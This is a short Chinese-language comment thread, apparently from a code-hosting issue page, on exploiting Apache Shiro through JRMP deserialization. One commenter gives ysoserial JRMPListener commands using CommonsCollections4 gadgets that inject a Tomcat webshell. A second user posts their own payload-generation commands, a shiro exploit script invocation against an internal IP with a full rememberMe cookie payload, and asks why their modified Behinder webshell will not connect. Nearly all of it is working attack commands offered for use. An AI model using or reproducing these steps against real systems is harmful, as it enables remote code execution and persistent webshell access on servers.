Litch1-v
commented
3 years ago 不好意思,看你的意思应该是想利用JRMP打shiro?那一共需要启动两次JRMPListener 一次使用CommonsCollections4TomcatShell 一次使用CommonsCollections4ShellInject java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4TomcatShell "pass" java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4ShellInject "pass" 然后shiro exp 打两次
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections4TomcatShell "pass" >1.ser
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 1.ser
python shiro_exp_payload.py 192.168.110.8:1099 rememberMe=BWRrrnY1Q7yCjBqZvLtEeC+2z/3ZRCVDO2zmN1JAL9MGehwC4BdEE9Hk/cdb9D3r3egy+qRveCHkiMlRItRdE4dudhfKG0e/1If8CSIpLjRCW2lIMmU2WcZh8eUaWAoRRInb9Jri9TMUMH4YrP7sDknMRSHavsB2vdrdAiuoHK/wj5XDsbhURldTUAxvPnmf5iH0ML2go2oVwDe7eZ5WASqZ3c6zz51EKj91/983rl7NjlHyI5nTVrbvwt0mJMj5rqZeN0XfXEOJHL8VLOiW0d5JEEcihgm+QPZ71/QFG6S5WEU7eXsvS3hOsTUCiFD6MIQiKh5pXYaquoAgN/yK406jTnI7+DcHUsDcZD0yyZlr4ViqU7PZ0654YtUAZH1WsKKthWK13OW2k1sD8QoKzw==
长亭的大表哥,是这样弄的嘛,Shiro,修改后的冰蝎连接不上,小弟有点菜,麻烦表哥抽空给我解答一下